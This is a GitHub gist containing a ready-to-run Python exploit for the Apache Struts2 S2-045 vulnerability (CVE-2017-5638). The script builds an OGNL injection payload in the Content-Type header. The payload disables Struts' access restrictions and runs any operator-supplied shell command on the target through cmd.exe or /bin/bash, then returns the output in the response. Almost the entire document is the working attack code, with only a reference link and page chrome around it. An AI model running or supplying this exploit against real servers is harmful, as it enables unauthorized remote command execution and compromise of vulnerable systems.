Created
July 31, 2020 16:08
-
-
Save Mah1ndra/9e02098ed757ed677c6a6873c0a54f76 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Reference: https://medium.com/@lucideus/exploiting-apache-struts2-cve-2017-5638-lucideus-research-83adb9490ede | |
# CVE: 2017-5638 - Apache Struts2 S2-045 | |
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
import urllib2 | |
import httplib | |
def exploit(url, cmd): | |
payload = "%{(#_='multipart/form-data')." | |
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." | |
payload += "(#_memberAccess?" | |
payload += "(#_memberAccess=#dm):" | |
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." | |
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." | |
payload += "(#ognlUtil.getExcludedPackageNames().clear())." | |
payload += "(#ognlUtil.getExcludedClasses().clear())." | |
payload += "(#context.setMemberAccess(#dm))))." | |
payload += "(#cmd='%s')." % cmd | |
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." | |
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." | |
payload += "(#p=new java.lang.ProcessBuilder(#cmds))." | |
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." | |
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." | |
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." | |
payload += "(#ros.flush())}" | |
try: | |
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} | |
request = urllib2.Request(url, headers=headers) | |
page = urllib2.urlopen(request).read() | |
except httplib.IncompleteRead, e: | |
page = e.partial | |
print(page) | |
return page | |
if __name__ == '__main__': | |
import sys | |
if len(sys.argv) != 3: | |
print("[*] str.py <url> <cmd>") | |
else: | |
print('[*]CVE: 2017-5638 - Apache Struts2 S2-045') | |
url = sys.argv[1] | |
cmd = sys.argv[2] | |
print("[*] cmd: %s\n" % cmd) | |
exploit(url, cmd) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment